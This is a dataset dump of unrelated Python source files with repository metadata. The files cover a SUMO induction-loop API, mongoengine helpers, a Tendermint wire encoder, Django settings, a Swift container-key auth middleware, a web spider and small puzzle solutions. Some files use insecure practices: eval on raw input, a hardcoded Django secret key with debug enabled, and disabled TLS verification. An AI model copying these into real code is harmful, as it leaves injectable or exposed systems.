entryTime = result.readDouble()
result.read("!B")
leaveTime = result.readDouble()
result.read("!B")
typeID = result.readString()
data.append([vehID, length, entryTime, leaveTime, typeID])
return data
_RETURN_VALUE_FUNC = {tc.VAR_POSITION: Storage.readDouble,
tc.VAR_LANE_ID: Storage.readString,
tc.LAST_STEP_VEHICLE_NUMBER: Storage.readDouble,
tc.LAST_STEP_MEAN_SPEED: Storage.readDouble,
tc.LAST_STEP_VEHICLE_ID_LIST: Storage.readStringList,
tc.LAST_STEP_OCCUPANCY: Storage.readDouble,
tc.LAST_STEP_LENGTH: Storage.readDouble,
tc.LAST_STEP_TIME_SINCE_DETECTION: Storage.readDouble,
tc.LAST_STEP_VEHICLE_DATA: readVehicleData}
class InductionLoopDomain(Domain):
def __init__(self):
Domain.__init__(self, "inductionloop", tc.CMD_GET_INDUCTIONLOOP_VARIABLE, None,
tc.CMD_SUBSCRIBE_INDUCTIONLOOP_VARIABLE, tc.RESPONSE_SUBSCRIBE_INDUCTIONLOOP_VARIABLE,
tc.CMD_SUBSCRIBE_INDUCTIONLOOP_CONTEXT, tc.RESPONSE_SUBSCRIBE_INDUCTIONLOOP_CONTEXT,
_RETURN_VALUE_FUNC)
def getPosition(self, loopID):
"""getPosition(string) -> double
Returns the position measured from the beginning of the lane in meters.
"""
return self._getUniversal(tc.VAR_POSITION, loopID)
def getLaneID(self, loopID):
"""getLaneID(string) -> string
Returns the id of the lane the loop is on.
"""
return self._getUniversal(tc.VAR_LANE_ID, loopID)
def getLastStepVehicleNumber(self, loopID):
"""getLastStepVehicleNumber(string) -> integer
Returns the number of vehicles that were on the named induction loop within the last simulation step.
"""
return self._getUniversal(tc.LAST_STEP_VEHICLE_NUMBER, loopID)
def getLastStepMeanSpeed(self, loopID):
"""getLastStepMeanSpeed(string) -> double
Returns the mean speed in m/s of vehicles that were on the named induction loop within the last simulation step.
"""
return self._getUniversal(tc.LAST_STEP_MEAN_SPEED, loopID)
def getLastStepVehicleIDs(self, loopID):
"""getLastStepVehicleIDs(string) -> list(string)
Returns the list of ids of vehicles that were on the named induction loop in the last simulation step.
"""
return self._getUniversal(tc.LAST_STEP_VEHICLE_ID_LIST, loopID)
def getLastStepOccupancy(self, loopID):
"""getLastStepOccupancy(string) -> double
Returns the percentage of time the detector was occupied by a vehicle.
"""
return self._getUniversal(tc.LAST_STEP_OCCUPANCY, loopID)
def getLastStepMeanLength(self, loopID):
"""getLastStepMeanLength(string) -> double
Returns the mean length in m of vehicles which were on the detector in the last step.
"""
return self._getUniversal(tc.LAST_STEP_LENGTH, loopID)
def getTimeSinceDetection(self, loopID):
"""getTimeSinceDetection(string) -> double
Returns the time in s since last detection.
"""
return self._getUniversal(tc.LAST_STEP_TIME_SINCE_DETECTION, loopID)
def getVehicleData(self, loopID):
"""getVehicleData(string) -> [(veh_id, veh_length, entry_time, exit_time, vType), ...]
Returns a complex structure containing several information about vehicles which passed the detector.
"""
return self._getUniversal(tc.LAST_STEP_VEHICLE_DATA, loopID)
InductionLoopDomain()
|
[
"ramonreisfontes@gmail.com"
] |
ramonreisfontes@gmail.com
|
eb7e5849b5f2b010cd504a91f7d1992192d5f1ef
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2634/48102/248806.py
|
7d3c7140dc5506ab531b4029d5a8e97dfc1a1732
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 316
|
py
|
def compare(a):
return a[0] / a[1]
def search(ls: list, target: int) -> list:
res = []
for i in range(len(ls)-1):
for j in range(i+1, len(ls)):
res.append([ls[i], ls[j]])
res.sort(key=compare)
return res[target-1]
lst = eval(input())
t = int(input())
print(search(lst, t))
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
6ebdf216116dcd30b8c2d256c9d9e25c1236a86e
|
d0533b0574494b13606a557620f38f5a2c74ce16
|
/venv/lib/python3.7/site-packages/mongoengine/base/common.py
|
82d2441786f944d1b4b33738eef42a64caa091a5
|
[
"GPL-1.0-or-later",
"MIT",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
CatTiger/vnpy
|
af889666464ab661fb30fdb0e8f71f94ba2d1e41
|
7901a0fb80a5b44d6fc752bd4b2b64ec62c8f84b
|
refs/heads/master
| 2020-09-26T00:37:54.123877
| 2020-07-13T10:15:46
| 2020-07-13T10:15:46
| 226,124,078
| 0
| 0
|
MIT
| 2020-04-21T03:02:20
| 2019-12-05T14:44:55
|
C++
|
UTF-8
|
Python
| false
| false
| 1,492
|
py
|
from mongoengine.errors import NotRegistered
__all__ = ('UPDATE_OPERATORS', 'get_document', '_document_registry')
UPDATE_OPERATORS = {'set', 'unset', 'inc', 'dec', 'mul',
'pop', 'push', 'push_all', 'pull',
'pull_all', 'add_to_set', 'set_on_insert',
'min', 'max', 'rename'}
_document_registry = {}
def get_document(name):
"""Get a registered Document class by name."""
doc = _document_registry.get(name, None)
if not doc:
# Possible old style name
single_end = name.split('.')[-1]
compound_end = '.%s' % single_end
possible_match = [k for k in _document_registry
if k.endswith(compound_end) or k == single_end]
if len(possible_match) == 1:
doc = _document_registry.get(possible_match.pop(), None)
if not doc:
raise NotRegistered("""
`%s` has not been registered in the document registry.
Importing the document class automatically registers it, has it
been imported?
""".strip() % name)
return doc
def _get_documents_by_db(connection_alias, default_connection_alias):
"""Get all registered Documents class attached to a given database"""
def get_doc_alias(doc_cls):
return doc_cls._meta.get('db_alias', default_connection_alias)
return [doc_cls for doc_cls in list(_document_registry.values())
if get_doc_alias(doc_cls) == connection_alias]
|
[
"guozc@133.com"
] |
guozc@133.com
|
a8fd073471237610101d66b5b5288bd5c2f35af1
|
90419da201cd4948a27d3612f0b482c68026c96f
|
/sdk/python/pulumi_azure_nextgen/devtestlab/__init__.py
|
7c60ecc2f02f80c2494ffe58a8560274e9866950
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
test-wiz-sec/pulumi-azure-nextgen
|
cd4bee5d70cb0d332c04f16bb54e17d016d2adaf
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
refs/heads/master
| 2023-06-08T02:35:52.639773
| 2020-11-06T22:39:06
| 2020-11-06T22:39:06
| 312,993,761
| 0
| 0
|
Apache-2.0
| 2023-06-02T06:47:28
| 2020-11-15T09:04:00
| null |
UTF-8
|
Python
| false
| false
| 282
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Make subpackages available:
from . import (
latest,
v20150521preview,
v20160515,
v20180915,
)
|
[
"public@paulstack.co.uk"
] |
public@paulstack.co.uk
|
b480f0d4a79df1e543ab8471ddd8b32a713f46a5
|
a61f73dd4cfd8d863e566f6b7422e1637967a1d7
|
/abci/example/python3/abci/wire.py
|
72f5fab8b0b227b6282599fe053b95fb0b57f555
|
[
"Apache-2.0"
] |
permissive
|
FirmaChain/tendermint
|
e1d91ee4c17f908c9f07d0771621201e9552e81f
|
aaa060fda4e3a564a32f1ba81f05cea93f6e34ce
|
refs/heads/master
| 2020-08-13T07:36:03.482612
| 2019-10-11T16:07:58
| 2019-10-11T16:07:58
| 214,933,104
| 14
| 0
|
Apache-2.0
| 2019-10-14T02:43:54
| 2019-10-14T02:43:53
| null |
UTF-8
|
Python
| false
| false
| 2,599
|
py
|
# the decoder works off a reader
# the encoder returns bytearray
def hex2bytes(h):
return bytearray(h.decode('hex'))
def bytes2hex(b):
if type(b) in (str, str):
return "".join([hex(ord(c))[2:].zfill(2) for c in b])
else:
return bytes2hex(b.decode())
# expects uvarint64 (no crazy big nums!)
def uvarint_size(i):
if i == 0:
return 0
for j in range(1, 8):
if i < 1 << j * 8:
return j
return 8
# expects i < 2**size
def encode_big_endian(i, size):
if size == 0:
return bytearray()
return encode_big_endian(i // 256, size - 1) + bytearray([i % 256])
def decode_big_endian(reader, size):
if size == 0:
return 0
firstByte = reader.read(1)[0]
return firstByte * (256 ** (size - 1)) + decode_big_endian(reader, size - 1)
# ints are max 16 bytes long
def encode_varint(i):
negate = False
if i < 0:
negate = True
i = -i
size = uvarint_size(i)
if size == 0:
return bytearray([0])
big_end = encode_big_endian(i, size)
if negate:
size += 0xF0
return bytearray([size]) + big_end
# returns the int and whats left of the byte array
def decode_varint(reader):
size = reader.read(1)[0]
if size == 0:
return 0
negate = True if size > int(0xF0) else False
if negate:
size = size - 0xF0
i = decode_big_endian(reader, size)
if negate:
i = i * (-1)
return i
def encode_string(s):
size = encode_varint(len(s))
return size + bytearray(s, 'utf8')
def decode_string(reader):
length = decode_varint(reader)
raw_data = reader.read(length)
return raw_data.decode()
def encode_list(s):
b = bytearray()
list(map(b.extend, list(map(encode, s))))
return encode_varint(len(s)) + b
def encode(s):
print('encoding', repr(s))
if s is None:
return bytearray()
if isinstance(s, int):
return encode_varint(s)
elif isinstance(s, str):
return encode_string(s)
elif isinstance(s, list):
return encode_list(s)
elif isinstance(s, bytearray):
return encode_string(s)
else:
print("UNSUPPORTED TYPE!", type(s), s)
if __name__ == '__main__':
ns = [100, 100, 1000, 256]
ss = [2, 5, 5, 2]
bs = list(map(encode_big_endian, ns, ss))
ds = list(map(decode_big_endian, bs, ss))
print(ns)
print([i[0] for i in ds])
ss = ["abc", "hi there jim", "ok now what"]
e = list(map(encode_string, ss))
d = list(map(decode_string, e))
print(ss)
print([i[0] for i in d])
|
[
"tim@readevalprint.com"
] |
tim@readevalprint.com
|
ee818994979e4463590d325b2c982d6640272e36
|
7332aca74ee82c69a64737668f6aba4a20078b1b
|
/mysite/settings.py
|
dba505eed042889de7cf95363039bd098723daab
|
[] |
no_license
|
bcastillo1/my-first-blog
|
f1609730a2a69dca94c07b0ed017717ad8218d85
|
4b4f3cfa66f2aff51e8b33805d6dc0e0314afa55
|
refs/heads/master
| 2020-03-30T07:00:39.662973
| 2018-09-29T22:26:58
| 2018-09-29T22:26:58
| 150,907,876
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,181
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_x1u4*9l1=$7byhrg7yr&7%ozhw7+jne_avltk@9gb^qc8i2qv'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [ '127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"you@example.com"
] |
you@example.com
|
6ecccd89ce3b40ed429583a7acf5dce755c3a3b2
|
6b265b404d74b09e1b1e3710e8ea872cd50f4263
|
/Python/Ising/ising_sim.py
|
480aca6617840c8fc9257de0549d3c56f609e818
|
[
"CC-BY-4.0"
] |
permissive
|
gjbex/training-material
|
cdc189469ae2c7d43784ecdcb4bcca10ecbc21ae
|
e748466a2af9f3388a8b0ed091aa061dbfc752d6
|
refs/heads/master
| 2023-08-17T11:02:27.322865
| 2023-04-27T14:42:55
| 2023-04-27T14:42:55
| 18,587,808
| 130
| 60
|
CC-BY-4.0
| 2023-08-03T07:07:25
| 2014-04-09T06:35:58
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,699
|
py
|
#!/usr/bin/env python
if __name__ == '__main__':
from argparse import ArgumentParser
import importlib
import random
import sys
from runner import DomainSizeRunner
from averager import Averager
from util import print_options
arg_parser = ArgumentParser(description='2D ising system simulaation')
arg_parser.add_argument('--N', type=int, default=10,
help='system size, i.e., N x N')
arg_parser.add_argument('--J', type=float, default=1.0,
help='spin-spin interactino energy')
arg_parser.add_argument('--H', type=float, default=0.0,
help='magnetic field')
arg_parser.add_argument('--T', default='1.5',
help='temerature in units k_b, can be '
'a comma-separated list')
arg_parser.add_argument('--steps', type=int, default=1000,
help='number of simulation steps')
arg_parser.add_argument('--burn_in', type=int, default=100,
help='burn in for averages')
arg_parser.add_argument('--sample_period', type=int, default=10,
help='sample period for averages')
arg_parser.add_argument('--window', type=int, default=20,
help='window size for convergence test')
arg_parser.add_argument('--max_slope', type=float, default=1e-4,
help='maximum slope as convergence criterion')
arg_parser.add_argument('--runs', type=int, default=10,
help='number of independent runs')
arg_parser.add_argument('--file', default='result',
help='output file base name')
arg_parser.add_argument('--verbose', type=int, default=1,
help='show progress information, the '
'higher the value, the more detail')
arg_parser.add_argument('--seed', type=int,
help='seed for random number generator, '
'only needed for development')
arg_parser.add_argument('--python', action='store_true',
help='use pure Python implementation')
options = arg_parser.parse_args()
magn_file = open('{0}-magn.txt'.format(options.file), 'w')
domain_file = open('{0}-domains.txt'.format(options.file), 'w')
if options.seed is None:
seed = random.randint(0, 1000000000)
else:
seed = options.seed
if options.python:
ising_module = importlib.import_module('ising')
else:
ising_module = importlib.import_module('ising_cxx')
hdr_line_fmt = 'T {M:s} {E:s} {deltaE2:s}\n'
hdr_fmt = '{0:s} {0:s}_std {0:s}_min {0:s}_max'
val_line_fmt = '{T:.4f} {M:s} {E:s} {deltaE2:s}\n'
val_fmt = '{mean:.5e} {std:.5e} {min:.5e} {max:.5e}'
M_hdr = hdr_fmt.format('M')
E_hdr = hdr_fmt.format('E')
deltaE2_hdr = hdr_fmt.format('deltaE^2')
magn_file.write(hdr_line_fmt.format(M=M_hdr, E=E_hdr,
deltaE2=deltaE2_hdr))
print_options(magn_file, options)
domain_file.write('T domain_sizes\n')
print_options(domain_file, options)
for T in (float(T_str) for T_str in options.T.split(',')):
if options.verbose > 0:
sys.stderr.write('# computing T = {0:.4f}\n'.format(T))
ising = ising_module.IsingSystem(options.N, options.J, options.H, T)
ising.init_random(seed)
runner = DomainSizeRunner(ising=None, steps=options.steps,
is_verbose=options.verbose - 2,
burn_in=options.burn_in,
sample_period=options.sample_period,
window=options.window)
averager = Averager(runner, ising, is_verbose=options.verbose - 1)
averager.average(options.runs)
M_values = averager.get('M mean')
M_str = val_fmt.format(**M_values)
E_values = averager.get('E mean')
E_str = val_fmt.format(**E_values)
deltaE2_values = averager.get('deltaE^2')
deltaE2_str = val_fmt.format(**deltaE2_values)
magn_file.write(val_line_fmt.format(T=T, M=M_str, E=E_str,
deltaE2=deltaE2_str))
magn_file.flush()
domains = averager.get('domains')
distrubtion = ','.join(['{0:d}:{1:.8e}'.format(k, v)
for k, v in domains.items()])
domain_file.write('{0:.4f} {1:s}\n'.format(T, distrubtion))
domain_file.flush()
magn_file.close()
domain_file.close()
|
[
"geertjan.bex@uhasselt.be"
] |
geertjan.bex@uhasselt.be
|
daf6ce6d701a3f7fd5d4d5556db1235f1aea559b
|
2d227925231be797cc78b644358ecd3adf00fba7
|
/ce/c240.py
|
802087ab037d7ba1d123f6f276c8a9eb0c788b26
|
[] |
no_license
|
egalli64/pythonesque
|
6bb107189d4556d832175d41366ea0b18ed6ea1d
|
154042c5ae5cf43a0ae2c03d509fc48d1dc19eb8
|
refs/heads/master
| 2023-07-07T05:50:14.711023
| 2023-07-01T10:52:24
| 2023-07-01T10:52:24
| 53,720,525
| 21
| 7
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,294
|
py
|
"""
Mersenne prime
author: Manny egalli64@gmail.com
info: http://thisthread.blogspot.com/2017/02/codeeval-mersenne-prime.html
https://www.codeeval.com/open_challenges/240/
"""
import sys
from math import sqrt
marsennes = [(2, 3)]
def is_prime(number):
for divisor in range(2, int(sqrt(number)) + 1):
if number % divisor == 0:
return False
return True
def trim(value):
i = 0
while marsennes[i][1] < value:
i += 1
return marsennes[:i]
def get_marsennes(value):
if value <= marsennes[-1][1]:
return trim(value)
index = marsennes[-1][0]
while True:
index += 1
if not is_prime(index):
continue
marsenne = 2**index - 1
marsennes.append((index, marsenne))
if marsenne < value:
continue
return marsennes if marsenne == value else marsennes[:-1]
def solution(line):
value = int(line)
result = get_marsennes(value)
return ', '.join(map(str, [r[1] for r in result]))
if __name__ == '__main__':
if len(sys.argv) == 2:
test_cases = open(sys.argv[1], 'r')
for test in test_cases:
print(solution(test.rstrip('\n')))
test_cases.close()
else:
print('Data filename expected as argument!')
|
[
"egalli64@gmail.com"
] |
egalli64@gmail.com
|
efc014f939c2d949b0cd19569ef658a32e5e1fe1
|
cb530e68e4151f793b42b84a86e75794e71efbc0
|
/containerkeys/middleware.py
|
993be599e94d17cbe850e168e41066d55a3807c3
|
[
"Apache-2.0"
] |
permissive
|
CloudBrewery/swift-container-keys
|
7614ffdf313a8cb90b128be08a4845a438705312
|
c6406dbc45858c13bd5cc7935dc81a9129141529
|
refs/heads/master
| 2021-01-15T11:12:04.166532
| 2015-01-09T17:41:14
| 2015-01-09T17:41:14
| 29,027,338
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,099
|
py
|
# Copyright (c) 2015 Cloud Brewery Inc. (cloudbrewery.io)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Container Keys Middleware
Allows for access to containers based on a simple key rather than requiring
a user to supply Keystone credentials, and embed them in their application.
Container keys supports two keys, specifically X-Container-Meta-Full-Key and
X-Container-Meta-Read-Key. Whichever is supplied will be authenticated against.
Read-Key will only accept GET requests, not POST/PUT/DELETE, which would be
supported by Full-Key.
Multiple keys can be set per container, of the following format:
X-Container-Meta-[Full|Read](-[1-9])?
The maximum number of keys that are checked is configurable, and can be used
to implement multiple valid keys per container, or a key recycling policy.
"""
from collections import defaultdict
from swift.common import utils as swift_utils
from swift.common.swob import HTTPUnauthorized
from swift.proxy.controllers.base import get_container_info
FULL_KEY = 'Full-Key'
READ_KEY = 'Read-Key'
FULL_KEY_HEADER = 'HTTP_X_CONTAINER_META_FULL_KEY'
READ_KEY_HAEDER = 'HTTP_X_CONTAINER_META_READ_KEY'
READ_RESTRICTED_METHODS = ['PUT', 'POST', 'DELETE']
DEFAULT_MAX_KEYS_PER_CONTAINER = 3
def generate_valid_metadata_keynames(key_name, max_keys):
"""
Generates a set of valid key names stored in a container's metadata to
include in results
:param key_name: base key (unprefixed)
:param max_keys: max number of valid keys
:returns: list of names of keys that are valid.
"""
cmp_key = key_name.lower()
valid_keynames = [
"%s-%s" % (cmp_key, i + 1) for i in xrange(1, max_keys)]
return [cmp_key, ] + valid_keynames
def get_container_keys_from_metadata(meta, max_keys):
"""
Extracts the container keys from metadata.
:param meta: container metadata
:param max_keys: max number of valid keys to check on a container
:returns: dict of keys found (possibly empty if no keys set)
"""
keys = defaultdict(list)
full_keys = generate_valid_metadata_keynames(FULL_KEY, max_keys)
read_keys = generate_valid_metadata_keynames(READ_KEY, max_keys)
for key, value in meta.iteritems():
v = swift_utils.get_valid_utf8_str(value)
cmp_key = key.lower()
if cmp_key in full_keys:
keys[FULL_KEY].append(v)
elif cmp_key in read_keys:
keys[READ_KEY].append(v)
return keys
def key_matches(to_match, keys):
"""
Checks whether the to_match key is in the list of keys. This leverages
the swift streq_const_time string comparator to guard against timing
attacks.
:param to_match: a key to check contains
:param keys: a list of keys to compare against
:returns: boolean
"""
return any(
[swift_utils.streq_const_time(to_match, key) for key in keys])
def extract_request_keys(env):
"""
Returns the key attempting to be used for the request by appearance in
the request headers
:param env: The WSGI environment for the request.
:returns: key type, key value
"""
headers = env.keys()
if FULL_KEY_HEADER in headers:
return FULL_KEY, env.get(FULL_KEY_HEADER)
elif READ_KEY_HAEDER in headers:
return READ_KEY, env.get(READ_KEY_HAEDER)
return None, None
class ContainerKeys(object):
"""
WSGI Middleware to grant access to containers based on pre-defined
Read / Full access API keys on a per-container basis. See the overview
for more information.
:param app: The next WSGI filter or app in the paste.deploy chain.
:param conf: The configuration dict for the middleware.
"""
def __init__(self, app, conf, max_keys_per_container=DEFAULT_MAX_KEYS_PER_CONTAINER):
self.app = app
self.conf = conf
self.max_keys_per_container = max_keys_per_container
self.logger = swift_utils.get_logger(conf, log_route='containerkeys')
def __call__(self, env, start_response):
"""
Main hook into the WSGI paste.deploy filter/app pipeline.
:param env: The WSGI environment dict.
:param start_response: The WSGI start_response hook.
:returns: Response as per WSGI.
"""
# Start by passing through based on the least amount of processing
# possible to regular auth.
if env.get('HTTP_X_AUTH_TOKEN', False):
# user is trying standard auth, continue the request per usual.
return self.app(env, start_response)
try_key_type, try_key_value = extract_request_keys(env)
if not try_key_value or not try_key_type:
# if no headers were attempted, pass through to keystone
# empty api key header is a no-op
return self.app(env, start_response)
keys = self._get_container_keys(env, start_response)
if not keys:
# if no keys are set on a container, pass through to keystone
return self.app(env, start_response)
#
# Begin marking requests as invalid, a user actually want to try now.
#
if try_key_type == READ_KEY:
if not key_matches(try_key_value, keys.get(READ_KEY)):
# invalid key
return self._invalid(env, start_response)
if env['REQUEST_METHOD'] in READ_RESTRICTED_METHODS:
# read keys cannot do non-read actions
return self._invalid(env, start_response)
elif (try_key_type == FULL_KEY
and not key_matches(try_key_value, keys.get(FULL_KEY))):
# invalid full key
return self._invalid(env, start_response)
#
# Thundercats are GO. Tell us not to continue authorization down the
# stream.
#
env['swift.authorize_override'] = True
return self.app(env, start_response)
def _get_container_keys(self, env, account):
"""
Returns the X-Container-Meta-[Full|Read]-Key-[N]? header values for the
container, or an empty dict if none are set.
:param env: The WSGI environment for the request.
:param account: Account str.
:returns: {key_type: key_value}
"""
container_info = get_container_info(env, self.app, swift_source='CK')
return get_container_keys_from_metadata(container_info['meta'],
self.max_keys_per_container)
def _invalid(self, env, start_response):
"""
Performs the necessary steps to indicate a WSGI 401
Unauthorized response to the request.
:param env: The WSGI environment for the request.
:param start_response: The WSGI start_response hook.
:returns: 401 response as per WSGI.
"""
if env['REQUEST_METHOD'] == 'HEAD':
body = None
else:
body = '401 Unauthorized: Auth Key invalid\n'
return HTTPUnauthorized(body=body)(env, start_response)
def filter_factory(global_conf, **local_conf):
"""Returns the WSGI filter for use with paste.deploy."""
conf = global_conf.copy()
conf.update(local_conf)
max_keys_per_container = int(conf.get('max_keys_per_container',
DEFAULT_MAX_KEYS_PER_CONTAINER))
swift_utils.register_swift_info(
'containerkeys',
max_keys_per_container=max_keys_per_container)
def auth_filter(app):
return ContainerKeys(
app, conf,
max_keys_per_container=max_keys_per_container)
return auth_filter
|
[
"thurloat@gmail.com"
] |
thurloat@gmail.com
|
7af4bd620c1eacbd1e6a1703e168ef6bebae1672
|
4875108ee320efe3e17346e35359f938af7146b1
|
/test.py
|
63c6f35d1d049bbe0fb91c7e5c802960d0956c47
|
[
"BSD-2-Clause"
] |
permissive
|
liuqingci/PSpider
|
504db41f69e61beaf22face04defe39a38a20843
|
45fffd5395027cb930898b9b728ba6f3d36bc034
|
refs/heads/master
| 2020-06-02T23:18:08.101128
| 2019-06-11T02:54:22
| 2019-06-11T06:13:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,083
|
py
|
# _*_ coding: utf-8 _*_
"""
test.py by xianhu
"""
import re
import sys
import spider
import random
import logging
import datetime
import requests
from bs4 import BeautifulSoup
requests.packages.urllib3.disable_warnings()
class MyFetcher(spider.Fetcher):
"""
fetcher module, rewrite url_fetch()
"""
def url_fetch(self, priority: int, url: str, keys: dict, deep: int, repeat: int, proxies=None):
response = requests.get(url, params=None, headers={}, data=None, proxies=proxies, verify=False, allow_redirects=True, timeout=(3.05, 10))
response.raise_for_status()
# test error-logging
assert random.randint(0, 100) != 8, "error-in-fetcher"
return 1, (response.status_code, response.url, response.text), 1
class MyParser(spider.Parser):
"""
parser module, rewrite htm_parse()
"""
def __init__(self, max_deep=0):
"""
constructor
"""
self._max_deep = max_deep
return
def htm_parse(self, priority: int, url: str, keys: dict, deep: int, content: object):
status_code, url_now, html_text = content
# test multi-processing(heavy time)
[BeautifulSoup(html_text, "lxml") for _ in range(10)]
url_list = []
if (self._max_deep < 0) or (deep < self._max_deep):
re_group = re.findall(r"<a.+?href=\"(?P<url>.{5,}?)\".*?>", html_text, flags=re.IGNORECASE)
url_list = [(spider.get_url_legal(_url, base_url=url), keys, priority+1) for _url in re_group]
# save_list can be list / tuple / dict
title = re.search(r"<title>(?P<title>.+?)</title>", html_text, flags=re.IGNORECASE)
# save_list = [(url, title.group("title").strip(), datetime.datetime.now()), ] if title else []
save_list = [{"url": url, "title": title.group("title").strip(), "datetime": datetime.datetime.now()}, ] if title else {}
# test error-logging
assert random.randint(0, 100) != 8, "error-in-parser"
return 1, url_list, save_list
class MySaver(spider.Saver):
"""
saver module, rewrite item_save()
"""
def __init__(self, save_pipe=sys.stdout):
"""
constructor
"""
self._save_pipe = save_pipe
return
def item_save(self, url: str, keys: dict, item: (list, tuple, dict)):
# item can be list / tuple / dict
# self._save_pipe.write("\t".join([str(col) for col in item]) + "\n")
self._save_pipe.write("\t".join([item["url"], item["title"], str(item["datetime"])]) + "\n")
self._save_pipe.flush()
return 1, None
class MyProxies(spider.Proxieser):
"""
proxies module, only rewrite proxies_get()
"""
def proxies_get(self):
response = requests.get("http://xxxx.com/proxies")
proxies_result = [{"http": "http://%s" % ipport, "https": "https://%s" % ipport} for ipport in response.text.split("\n")]
return 1, proxies_result
def test_spider():
"""
test spider
"""
# initial fetcher / parser / saver / proxieser
fetcher = MyFetcher(sleep_time=0, max_repeat=3)
parser = MyParser(max_deep=2)
saver = MySaver(save_pipe=open("out.txt", "w"))
proxieser = MyProxies(sleep_time=5)
# define url_filter
url_filter = spider.UrlFilter(white_patterns=(re.compile(r"^http[s]?://(www\.)?appinn\.com"), ), capacity=None)
# initial web_spider
# web_spider = spider.WebSpider(fetcher, parser, saver, proxieser=None, url_filter=url_filter, queue_parse_size=-1)
web_spider = spider.WebSpider(fetcher, parser, saver, proxieser=proxieser, url_filter=url_filter, queue_parse_size=100, queue_proxies_size=100)
# add start url
web_spider.set_start_url("https://www.appinn.com/", priority=0, keys={"type": "index"}, deep=0)
# start web_spider
web_spider.start_working(fetcher_num=20)
# wait for finished
web_spider.wait_for_finished()
return
if __name__ == "__main__":
logging.basicConfig(level=logging.WARNING, format="%(asctime)s\t%(levelname)s\t%(message)s")
test_spider()
exit()
|
[
"qixianhu@qq.com"
] |
qixianhu@qq.com
|
a3bb06d33689b7e7c1437a306a443d4701cb84c1
|
f2889a13368b59d8b82f7def1a31a6277b6518b7
|
/2007.py
|
21c2d0bc31844393f9fde2d7322b2be12978ac4f
|
[] |
no_license
|
htl1126/leetcode
|
dacde03de5c9c967e527c4c3b29a4547154e11b3
|
c33559dc5e0bf6879bb3462ab65a9446a66d19f6
|
refs/heads/master
| 2023-09-01T14:57:57.302544
| 2023-08-25T15:50:56
| 2023-08-25T15:50:56
| 29,514,867
| 7
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 558
|
py
|
# Ref: https://leetcode.com/problems/find-original-array-from-doubled-array/discuss/1470959/JavaC%2B%2BPython-Match-from-the-Smallest-or-Biggest-100
class Solution:
def findOriginalArray(self, changed: List[int]) -> List[int]:
c = collections.Counter(changed)
if c[0] % 2 == 1:
return []
for n in sorted(c): # need to sort the keys
